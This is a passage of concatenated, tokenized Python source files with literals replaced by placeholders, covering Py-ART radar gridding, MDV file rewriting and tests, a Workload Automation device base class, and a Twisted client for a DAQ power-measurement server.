<NUM_LIT:0> ] . fields . keys ( ) ) <EOL> for radar in radars [ <NUM_LIT:1> : ] : <EOL> fields = fields . intersection ( radar . fields . keys ( ) ) <EOL> fields = list ( fields ) <EOL> return fields <EOL> def _find_offsets ( radars , projparams , grid_origin_alt ) : <EOL> """<STR_LIT>""" <EOL> offsets = [ ] <EOL> for radar in radars : <EOL> x_disp , y_disp = geographic_to_cartesian ( <EOL> radar . longitude [ '<STR_LIT:data>' ] , radar . latitude [ '<STR_LIT:data>' ] , projparams ) <EOL> z_disp = float ( radar . altitude [ '<STR_LIT:data>' ] ) - grid_origin_alt <EOL> offsets . append ( ( z_disp , float ( y_disp ) , float ( x_disp ) ) ) <EOL> return offsets <EOL> def _find_grid_params ( grid_shape , grid_limits ) : <EOL> """<STR_LIT>""" <EOL> nz , ny , nx = grid_shape <EOL> zr , yr , xr = grid_limits <EOL> z_start , z_stop = zr <EOL> y_start , y_stop = yr <EOL> x_start , x_stop = xr <EOL> if nz == <NUM_LIT:1> : <EOL> z_step = <NUM_LIT:0.> <EOL> else : <EOL> z_step = ( z_stop - z_start ) / ( nz - <NUM_LIT:1.> ) <EOL> if ny == <NUM_LIT:1> : <EOL> y_step = <NUM_LIT:0.> <EOL> else : <EOL> y_step = ( y_stop - y_start ) / ( ny - <NUM_LIT:1.> ) <EOL> if nx == <NUM_LIT:1> : <EOL> x_step = <NUM_LIT:0.> <EOL> else : <EOL> x_step = ( x_stop - x_start ) / ( nx - <NUM_LIT:1.> ) <EOL> grid_starts = ( z_start , y_start , x_start ) <EOL> grid_steps = ( z_step , y_step , x_step ) <EOL> return grid_starts , grid_steps <EOL> def _parse_roi_func ( roi_func , constant_roi , z_factor , xy_factor , min_radius , <EOL> h_factor , nb , bsp , offsets ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( roi_func , RoIFunction ) : <EOL> if roi_func == '<STR_LIT>' : <EOL> roi_func = ConstantRoI ( constant_roi ) <EOL> elif roi_func == '<STR_LIT>' : <EOL> roi_func = DistRoI ( z_factor , xy_factor , min_radius , offsets ) <EOL> elif roi_func == '<STR_LIT>' : <EOL> roi_func = DistBeamRoI ( h_factor , nb , bsp , min_radius , offsets ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % roi_func ) <EOL> return roi_func </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> import StringIO <EOL> import gzip <EOL> import pyart <EOL> MASTER_HEADER_SIZE = <NUM_LIT> <EOL> FIELD_HEADER_SIZE = <NUM_LIT> <EOL> VLEVEL_HEADER_SIZE = <NUM_LIT> <EOL> CHUNK_HEADER_SIZE = <NUM_LIT> <EOL> COMPRESSION_INFO_SIZE = <NUM_LIT> <EOL> SWEEP_INFO_SIZE = <NUM_LIT:8> <EOL> FIELD_NUMBER = <NUM_LIT:3> <EOL> NGATES = <NUM_LIT> <EOL> NFIELDS = <NUM_LIT:1> <EOL> INFILE = '<STR_LIT>' <EOL> OUTFILE = '<STR_LIT>' <EOL> mdvfile = pyart . io . mdv . MdvFile ( INFILE ) <EOL> number_of_fields = int ( mdvfile . master_header [ '<STR_LIT>' ] ) <EOL> bias = mdvfile . field_headers [ FIELD_NUMBER ] [ '<STR_LIT>' ] <EOL> scale = mdvfile . field_headers [ FIELD_NUMBER ] [ '<STR_LIT>' ] <EOL> in_field_offset = mdvfile . field_headers [ FIELD_NUMBER ] [ '<STR_LIT>' ] <EOL> fdata = ( ( mdvfile . read_a_field ( FIELD_NUMBER ) - bias ) / scale ) [ <NUM_LIT:0> , : , : NGATES ] <EOL> mdvfile . close ( ) <EOL> fdata_str = fdata . astype ( '<STR_LIT>' ) . byteswap ( ) . tostring ( ) <EOL> uncompressed_data_size = len ( fdata_str ) <EOL> fileobj = StringIO . StringIO ( ) <EOL> gzipfile = gzip . GzipFile ( fileobj = fileobj , mode = '<STR_LIT:w>' ) <EOL> gzipfile . write ( fdata_str ) <EOL> gzipfile . close ( ) <EOL> compressed_field_data = fileobj . getvalue ( ) <EOL> compressed_data_size = len ( compressed_field_data ) <EOL> f = open ( INFILE , '<STR_LIT:rb>' ) <EOL> out = open ( OUTFILE , '<STR_LIT:wb>' ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> l [ <NUM_LIT> ] = NFIELDS <EOL> l [ <NUM_LIT:20> ] = NGATES <EOL> l [ <NUM_LIT> ] = MASTER_HEADER_SIZE <EOL> l [ <NUM_LIT> ] = MASTER_HEADER_SIZE + FIELD_HEADER_SIZE <EOL> l [ <NUM_LIT> ] = MASTER_HEADER_SIZE + FIELD_HEADER_SIZE + VLEVEL_HEADER_SIZE <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( MASTER_HEADER_SIZE + FIELD_NUMBER * FIELD_HEADER_SIZE ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> l [ <NUM_LIT:9> ] = NGATES <EOL> field_data_offset = ( MASTER_HEADER_SIZE + FIELD_HEADER_SIZE + <EOL> VLEVEL_HEADER_SIZE + CHUNK_HEADER_SIZE * FIELD_NUMBER ) <EOL> l [ <NUM_LIT:15> ] = field_data_offset <EOL> l [ <NUM_LIT:16> ] = compressed_data_size + COMPRESSION_INFO_SIZE + SWEEP_INFO_SIZE <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( MASTER_HEADER_SIZE + FIELD_HEADER_SIZE * number_of_fields + <EOL> FIELD_NUMBER * VLEVEL_HEADER_SIZE ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( MASTER_HEADER_SIZE + FIELD_HEADER_SIZE * number_of_fields + <EOL> VLEVEL_HEADER_SIZE * number_of_fields ) <EOL> fmt = '<STR_LIT>' <EOL> chunk_data_offset = ( compressed_data_size + field_data_offset + <EOL> SWEEP_INFO_SIZE + COMPRESSION_INFO_SIZE ) <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> info_chunk_offset = int ( l [ <NUM_LIT:3> ] ) <EOL> l [ <NUM_LIT:3> ] = chunk_data_offset <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> calib_chunk_offset = int ( l [ <NUM_LIT:3> ] ) <EOL> l [ <NUM_LIT:3> ] = chunk_data_offset + <NUM_LIT> <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> elevs_chunk_offset = int ( l [ <NUM_LIT:3> ] ) <EOL> l [ <NUM_LIT:3> ] = chunk_data_offset + <NUM_LIT> + <NUM_LIT> <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( in_field_offset ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> l [ <NUM_LIT:1> ] = uncompressed_data_size <EOL> l [ <NUM_LIT:2> ] = compressed_data_size + COMPRESSION_INFO_SIZE <EOL> l [ <NUM_LIT:3> ] = compressed_data_size <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> out . write ( compressed_field_data ) <EOL> f . seek ( info_chunk_offset ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> l [ <NUM_LIT:2> ] = NFIELDS <EOL> l [ <NUM_LIT:3> ] = NGATES <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( calib_chunk_offset ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( elevs_chunk_offset ) <EOL> fmt = '<STR_LIT>' % ( <NUM_LIT:2> ) <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> out . close ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import pyart <EOL> def test_is_vpt ( ) : <EOL> radar = pyart . testing . make_empty_ppi_radar ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert not pyart . util . is_vpt ( radar ) <EOL> pyart . util . to_vpt ( radar ) <EOL> assert pyart . util . is_vpt ( radar ) <EOL> def test_to_vpt ( ) : <EOL> radar = pyart . testing . make_empty_ppi_radar ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:3> ) <EOL> radar . instrument_parameters = { <EOL> '<STR_LIT>' : { '<STR_LIT:data>' : np . array ( [ '<STR_LIT>' ] * <NUM_LIT:3> ) } <EOL> } <EOL> pyart . util . to_vpt ( radar ) <EOL> assert pyart . util . is_vpt ( radar ) <EOL> assert radar . nsweeps == <NUM_LIT:1> <EOL> assert radar . azimuth [ '<STR_LIT:data>' ] [ <NUM_LIT:10> ] == <NUM_LIT:0.0> <EOL> assert radar . elevation [ '<STR_LIT:data>' ] [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> assert len ( radar . instrument_parameters [ '<STR_LIT>' ] [ '<STR_LIT:data>' ] ) == <NUM_LIT:1> <EOL> radar = pyart . testing . make_empty_ppi_radar ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:3> ) <EOL> radar . instrument_parameters = { <EOL> '<STR_LIT>' : { '<STR_LIT:data>' : np . array ( [ '<STR_LIT>' ] * <NUM_LIT:3> ) } <EOL> } <EOL> pyart . util . to_vpt ( radar , False ) <EOL> assert pyart . util . is_vpt ( radar ) <EOL> assert radar . nsweeps == <NUM_LIT> <EOL> assert radar . azimuth [ '<STR_LIT:data>' ] [ <NUM_LIT:10> ] == <NUM_LIT> <EOL> assert radar . elevation [ '<STR_LIT:data>' ] [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> assert len ( radar . instrument_parameters [ '<STR_LIT>' ] [ '<STR_LIT:data>' ] ) == <NUM_LIT> </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import imp <EOL> import string <EOL> from collections import OrderedDict <EOL> from contextlib import contextmanager <EOL> from wlauto . core . extension import Extension , ExtensionMeta , AttributeCollection , Parameter <EOL> from wlauto . core . extension_loader import ExtensionLoader <EOL> from wlauto . exceptions import DeviceError , ConfigError <EOL> from wlauto . utils . types import list_of_integers , list_of , caseless_string <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RuntimeParameter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , getter , setter , <EOL> getter_args = None , setter_args = None , <EOL> value_name = '<STR_LIT:value>' , override = False ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . getter = getter <EOL> self . setter = setter <EOL> self . getter_args = getter_args or { } <EOL> self . setter_args = setter_args or { } <EOL> self . value_name = value_name <EOL> self . override = override <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> __repr__ = __str__ <EOL> class CoreParameter ( RuntimeParameter ) : <EOL> """<STR_LIT>""" <EOL> def get_runtime_parameters ( self , core_names ) : <EOL> params = [ ] <EOL> for core in set ( core_names ) : <EOL> name = string . Template ( self . name ) . substitute ( core = core ) <EOL> getter = string . Template ( self . getter ) . substitute ( core = core ) <EOL> setter = string . Template ( self . setter ) . substitute ( core = core ) <EOL> getargs = dict ( self . getter_args . items ( ) + [ ( '<STR_LIT>' , core ) ] ) <EOL> setargs = dict ( self . setter_args . items ( ) + [ ( '<STR_LIT>' , core ) ] ) <EOL> params . append ( RuntimeParameter ( name , getter , setter , getargs , setargs , self . value_name , self . override ) ) <EOL> return params <EOL> class DynamicModuleSpec ( dict ) : <EOL> @ property <EOL> def name ( self ) : <EOL> return self . keys ( ) [ <NUM_LIT:0> ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> dict . __init__ ( self ) <EOL> if args : <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> raise ValueError ( args ) <EOL> value = args [ <NUM_LIT:0> ] <EOL> else : <EOL> value = kwargs <EOL> if isinstance ( value , basestring ) : <EOL> self [ value ] = { } <EOL> elif isinstance ( value , dict ) and len ( value ) == <NUM_LIT:1> : <EOL> for k , v in value . iteritems ( ) : <EOL> self [ k ] = v <EOL> else : <EOL> raise ValueError ( value ) <EOL> class DeviceMeta ( ExtensionMeta ) : <EOL> to_propagate = ExtensionMeta . to_propagate + [ <EOL> ( '<STR_LIT>' , RuntimeParameter , AttributeCollection ) , <EOL> ( '<STR_LIT>' , DynamicModuleSpec , AttributeCollection ) , <EOL> ] <EOL> class Device ( Extension ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = DeviceMeta <EOL> parameters = [ <EOL> Parameter ( '<STR_LIT>' , kind = list_of ( caseless_string ) , mandatory = True , default = None , <EOL> description = """<STR_LIT>""" ) , <EOL> Parameter ( '<STR_LIT>' , kind = list_of_integers , mandatory = True , default = None , <EOL> description = """<STR_LIT>""" ) , <EOL> ] <EOL> runtime_parameters = [ ] <EOL> dynamic_modules = [ ] <EOL> name = None <EOL> platform = None <EOL> default_working_directory = None <EOL> has_gpu = None <EOL> path_module = None <EOL> active_cores = None <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( Device , self ) . __init__ ( ** kwargs ) <EOL> if not self . path_module : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> libpath = os . path . dirname ( os . __file__ ) <EOL> modpath = os . path . join ( libpath , self . path_module ) <EOL> if not modpath . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> modpath += '<STR_LIT>' <EOL> try : <EOL> self . path = imp . load_source ( '<STR_LIT>' , modpath ) <EOL> except IOError : <EOL> raise DeviceError ( '<STR_LIT>' . format ( self . path_module ) ) <EOL> def validate ( self ) : <EOL> if self . core_names and not self . core_clusters : <EOL> self . core_clusters = [ ] <EOL> clusters = [ ] <EOL> for cn in self . core_names : <EOL> if cn not in clusters : <EOL> clusters . append ( cn ) <EOL> self . core_clusters . append ( clusters . index ( cn ) ) <EOL> if len ( self . core_names ) != len ( self . core_clusters ) : <EOL> raise ConfigError ( '<STR_LIT>' ) <EOL> def initialize ( self , context ) : <EOL> """<STR_LIT>""" <EOL> loader = ExtensionLoader ( ) <EOL> for module_spec in self . dynamic_modules : <EOL> module = self . _load_module ( loader , module_spec ) <EOL> if not hasattr ( module , '<STR_LIT>' ) : <EOL> message = '<STR_LIT>' <EOL> raise ValueError ( message . format ( module . name ) ) <EOL> if module . probe ( self ) : <EOL> self . logger . debug ( '<STR_LIT>' . format ( module . name ) ) <EOL> self . _install_module ( module ) <EOL> else : <EOL> self . logger . debug ( '<STR_LIT>' . format ( module . name ) ) <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def boot ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def connect ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def ping ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_runtime_parameter_names ( self ) : <EOL> return [ p . name for p in self . _expand_runtime_parameters ( ) ] <EOL> def get_runtime_parameters ( self ) : <EOL> """<STR_LIT>""" <EOL> runtime_parameters = OrderedDict ( ) <EOL> for rtp in self . _expand_runtime_parameters ( ) : <EOL> if not rtp . getter : <EOL> continue <EOL> getter = getattr ( self , rtp . getter ) <EOL> rtp_value = getter ( ** rtp . getter_args ) <EOL> runtime_parameters [ rtp . name ] = rtp_value <EOL> return runtime_parameters <EOL> def set_runtime_parameters ( self , params ) : <EOL> """<STR_LIT>""" <EOL> runtime_parameters = self . _expand_runtime_parameters ( ) <EOL> rtp_map = { rtp . name . lower ( ) : rtp for rtp in runtime_parameters } <EOL> params = OrderedDict ( ( k . lower ( ) , v ) for k , v in params . iteritems ( ) if v is not None ) <EOL> expected_keys = rtp_map . keys ( ) <EOL> if not set ( params . keys ( ) ) . issubset ( set ( expected_keys ) ) : <EOL> unknown_params = list ( set ( params . keys ( ) ) . difference ( set ( expected_keys ) ) ) <EOL> raise ConfigError ( '<STR_LIT>' . format ( unknown_params ) ) <EOL> for param in params : <EOL> self . logger . debug ( '<STR_LIT>' . format ( param ) ) <EOL> rtp = rtp_map [ param ] <EOL> setter = getattr ( self , rtp . setter ) <EOL> args = dict ( rtp . setter_args . items ( ) + [ ( rtp . value_name , params [ rtp . name . lower ( ) ] ) ] ) <EOL> setter ( ** args ) <EOL> def capture_screen ( self , filepath ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_properties ( self , output_path ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def listdir ( self , path , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def push_file ( self , source , dest ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def pull_file ( self , source , dest ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def delete_file ( self , filepath ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def file_exists ( self , filepath ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_pids_of ( self , process_name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def kill ( self , pid , as_root = False ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def killall ( self , process_name , as_root = False ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def install ( self , filepath , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def uninstall ( self , filepath ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def execute ( self , command , timeout = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def set_sysfile_value ( self , filepath , value , verify = True ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_sysfile_value ( self , sysfile , kind = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . name ) <EOL> __repr__ = __str__ <EOL> def _expand_runtime_parameters ( self ) : <EOL> expanded_params = [ ] <EOL> for param in self . runtime_parameters : <EOL> if isinstance ( param , CoreParameter ) : <EOL> expanded_params . extend ( param . get_runtime_parameters ( self . core_names ) ) <EOL> else : <EOL> expanded_params . append ( param ) <EOL> return expanded_params <EOL> @ contextmanager <EOL> def _check_alive ( self ) : <EOL> try : <EOL> yield <EOL> except Exception as e : <EOL> self . ping ( ) <EOL> raise e </s>
<s> import os <EOL> import sys <EOL> from twisted . internet import reactor <EOL> from twisted . internet . protocol import Protocol , ClientFactory , ReconnectingClientFactory <EOL> from twisted . internet . error import ConnectionLost , ConnectionDone <EOL> from twisted . protocols . basic import LineReceiver <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> from daqpower import log <EOL> from daqpower . common import DaqServerRequest , DaqServerResponse , Status <EOL> from daqpower . config import get_config_parser <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Command ( object ) : <EOL> def __init__ ( self , name , ** params ) : <EOL> self . name = name <EOL> self . params = params <EOL> class CommandResult ( object ) : <EOL> def __init__ ( self ) : <EOL> self . status = None <EOL> self . message = None <EOL> self . data = None <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . status , self . message ) <EOL> class CommandExecutorProtocol ( Protocol ) : <EOL> def __init__ ( self , command , timeout = <NUM_LIT:10> , retries = <NUM_LIT:1> ) : <EOL> self . command = command <EOL> self . sent_request = None <EOL> self . waiting_for_response = False <EOL> self . keep_going = None <EOL> self . ports_to_pull = None <EOL> self . factory = None <EOL> self . timeoutCallback = None <EOL> self . timeout = timeout <EOL> self . retries = retries <EOL> self . retry_count = <NUM_LIT:0> <EOL> def connectionMade ( self ) : <EOL> if self . command . name == '<STR_LIT>' : <EOL> self . sendRequest ( '<STR_LIT>' ) <EOL> else : <EOL> self . sendRequest ( self . command . name , ** self . command . params ) <EOL> def connectionLost ( self , reason = ConnectionDone ) : <EOL> if isinstance ( reason , ConnectionLost ) : <EOL> self . errorOut ( '<STR_LIT>' . format ( reason ) ) <EOL> elif self . waiting_for_response : <EOL> self . errorOut ( '<STR_LIT>' ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> def sendRequest ( self , command , ** params ) : <EOL> self . sent_request = DaqServerRequest ( command , params ) <EOL> request_string = self . sent_request . serialize ( ) <EOL> log . debug ( '<STR_LIT>' . format ( request_string ) ) <EOL> self . transport . write ( '<STR_LIT>' . join ( [ request_string , '<STR_LIT:\r\n>' ] ) ) <EOL> self . timeoutCallback = reactor . callLater ( self . timeout , self . requestTimedOut ) <EOL> self . waiting_for_response = True <EOL> def dataReceived ( self , data ) : <EOL> self . keep_going = False <EOL> if self . waiting_for_response : <EOL> self . waiting_for_response = False <EOL> self . timeoutCallback . cancel ( ) <EOL> try : <EOL> response = DaqServerResponse . deserialize ( data ) <EOL> except Exception , e : <EOL> self . errorOut ( '<STR_LIT>' . format ( data , e ) ) <EOL> else : <EOL> if response . status != Status . ERROR : <EOL> self . processResponse ( response ) <EOL> if not self . keep_going : <EOL> self . commandCompleted ( response . status , response . message , response . data ) <EOL> else : <EOL> self . errorOut ( response . message ) <EOL> else : <EOL> self . errorOut ( '<STR_LIT>' . format ( data ) ) <EOL> def processResponse ( self , response ) : <EOL> if self . sent_request . command in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . processPortsResponse ( response ) <EOL> elif self . sent_request . command == '<STR_LIT>' : <EOL> self . processDevicesResponse ( response ) <EOL> elif self . sent_request . command == '<STR_LIT>' : <EOL> self . processPullResponse ( response ) <EOL> def processPortsResponse ( self , response ) : <EOL> if '<STR_LIT>' not in response . data : <EOL> self . errorOut ( '<STR_LIT>' . format ( response , response . data ) ) <EOL> ports = response . data [ '<STR_LIT>' ] <EOL> response . data = ports <EOL> if self . command . name == '<STR_LIT>' : <EOL> if ports : <EOL> self . ports_to_pull = ports <EOL> self . sendPullRequest ( self . ports_to_pull . pop ( ) ) <EOL> else : <EOL> response . status = Status . OKISH <EOL> response . message = '<STR_LIT>' <EOL> def processDevicesResponse ( self , response ) : <EOL> if response . status == Status . OK : <EOL> if '<STR_LIT>' not in response . data : <EOL> self . errorOut ( '<STR_LIT>' . format ( response , response . data ) ) <EOL> devices = response . data [ '<STR_LIT>' ] <EOL> response . data = devices <EOL> def sendPullRequest ( self , port_id ) : <EOL> self . sendRequest ( '<STR_LIT>' , port_id = port_id ) <EOL> self . keep_going = True <EOL> def processPullResponse ( self , response ) : <EOL> if '<STR_LIT>' not in response . data : <EOL> self . errorOut ( '<STR_LIT>' . format ( response , response . data ) ) <EOL> port_number = response . data . pop ( '<STR_LIT>' ) <EOL> filename = self . sent_request . params [ '<STR_LIT>' ] + '<STR_LIT>' <EOL> self . factory . initiateFileTransfer ( filename , port_number ) <EOL> if self . ports_to_pull : <EOL> self . sendPullRequest ( self . ports_to_pull . pop ( ) ) <EOL> def commandCompleted ( self , status , message = None , data = None ) : <EOL> self . factory . result . status = status <EOL> self . factory . result . message = message <EOL> self . factory . result . data = data <EOL> self . transport . loseConnection ( ) <EOL> def requestTimedOut ( self ) : <EOL> self . retry_count += <NUM_LIT:1> <EOL> if self . retry_count > self . retries : <EOL> self . errorOut ( "<STR_LIT>" ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . connectionMade ( ) <EOL> def errorOut ( self , message ) : <EOL> self . factory . errorOut ( message ) <EOL> class CommandExecutorFactory ( ClientFactory ) : <EOL> protocol = CommandExecutorProtocol <EOL> wait_delay = <NUM_LIT:1> <EOL> def __init__ ( self , config , command , timeout = <NUM_LIT:10> , retries = <NUM_LIT:1> ) : <EOL> self . config = config <EOL> self . command = command <EOL> self . timeout = timeout <EOL> self . retries = retries <EOL> self . result = CommandResult ( ) <EOL> self . done = False <EOL> self . transfers_in_progress = { } <EOL> if command . name == '<STR_LIT>' : <EOL> if '<STR_LIT>' not in command . params : <EOL> self . errorOut ( '<STR_LIT>' ) <EOL> self . output_directory = command . params [ '<STR_LIT>' ] <EOL> if not os . path . isdir ( self . output_directory ) : <EOL> log . debug ( '<STR_LIT>' . format ( self . output_directory ) ) <EOL> os . makedirs ( self . output_directory ) <EOL> def buildProtocol ( self , addr ) : <EOL> protocol = CommandExecutorProtocol ( self . command , self . timeout , self . retries ) <EOL> protocol . factory = self <EOL> return protocol <EOL> def initiateFileTransfer ( self , filename , port ) : <EOL> log . debug ( '<STR_LIT>' . format ( filename , port ) ) <EOL> filepath = os . path . join ( self . output_directory , filename ) <EOL> session = FileReceiverFactory ( filepath , self ) <EOL> connector = reactor . connectTCP ( self . config . host , port , session ) <EOL> self . transfers_in_progress [ session ] = connector <EOL> def transferComplete ( self , session ) : <EOL> connector = self . transfers_in_progress [ session ] <EOL> log . debug ( '<STR_LIT>' . format ( connector . port ) ) <EOL> del self . transfers_in_progress [ session ] <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> if self . transfers_in_progress : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . waitForTransfersToCompleteAndExit ( ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> self . result . status = Status . ERROR <EOL> self . result . message = '<STR_LIT>' <EOL> self . waitForTransfersToCompleteAndExit ( ) <EOL> def waitForTransfersToCompleteAndExit ( self ) : <EOL> if self . transfers_in_progress : <EOL> reactor . callLater ( self . wait_delay , self . waitForTransfersToCompleteAndExit ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> reactor . stop ( ) <EOL> def errorOut ( self , message ) : <EOL> self . result . status = Status . ERROR <EOL> self . result . message = message <EOL> reactor . crash ( ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . command . name ) <EOL> __repr__ = __str__ <EOL> class FileReceiver ( LineReceiver ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . fh = None <EOL> self . factory = None <EOL> def connectionMade ( self ) : <EOL> if os . path . isfile ( self . path ) : <EOL> log . warning ( '<STR_LIT>' ) <EOL> os . remove ( self . path ) <EOL> self . fh = open ( self . path , '<STR_LIT:w>' ) <EOL> def connectionLost ( self , reason = ConnectionDone ) : <EOL> if self . fh : <EOL> self . fh . close ( ) <EOL> def lineReceived ( self , line ) : <EOL> line = line . rstrip ( '<STR_LIT:\r\n>' ) + '<STR_LIT:\n>' <EOL> self . fh . write ( line ) <EOL> class FileReceiverFactory ( ReconnectingClientFactory ) : <EOL> def __init__ ( self , path , owner ) : <EOL> self . path = path <EOL> self . owner = owner <EOL> def buildProtocol ( self , addr ) : <EOL> protocol = FileReceiver ( self . path ) <EOL> protocol . factory = self <EOL> self . resetDelay ( ) <EOL> return protocol <EOL> def clientConnectionLost ( self , conector , reason ) : <EOL> if isinstance ( reason , ConnectionLost ) : <EOL> log . error ( '<STR_LIT>' . format ( reason ) ) <EOL> ReconnectingClientFactory . clientConnectionLost ( self , conector , reason ) <EOL> else : <EOL> self . owner . transferComplete ( self ) <EOL> def clientConnectionFailed ( self , conector , reason ) : <EOL> if isinstance ( reason , ConnectionLost ) : <EOL> log . error ( '<STR_LIT>' . format ( reason ) ) <EOL> ReconnectingClientFactory . clientConnectionFailed ( self , conector , reason ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . path ) <EOL> __repr__ = __str__ <EOL> def execute_command ( server_config , command , ** kwargs ) : <EOL> before_fds = _get_open_fds ( ) <EOL> if isinstance ( command , basestring ) : <EOL> command = Command ( command , ** kwargs ) <EOL> timeout = <NUM_LIT> if command . name in [ '<STR_LIT>' , '<STR_LIT>' ] else <NUM_LIT:10> <EOL> factory = CommandExecutorFactory ( server_config , command , timeout ) <EOL> from twisted . internet import default <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> default . install ( ) <EOL> global reactor <EOL> reactor = sys . modules [ '<STR_LIT>' ] <EOL> try : <EOL> reactor . connectTCP ( server_config . host , server_config . port , factory ) <EOL> reactor . run ( ) <EOL> return factory . result <EOL> finally : <EOL> import signal <EOL> signal . signal ( signal . SIGINT , signal . default_int_handler ) <EOL> after_fds = _get_open_fds ( ) <EOL> for fd in after_fds - before_fds : <EOL> try : <EOL> os . close ( int ( fd [ <NUM_LIT:1> : ] ) ) <EOL> except OSError : <EOL> pass <EOL> def _get_open_fds ( ) : <EOL> if os . name == '<STR_LIT>' : <EOL> import subprocess <EOL> pid = os . getpid ( ) <EOL> procs = subprocess . check_output ( [ 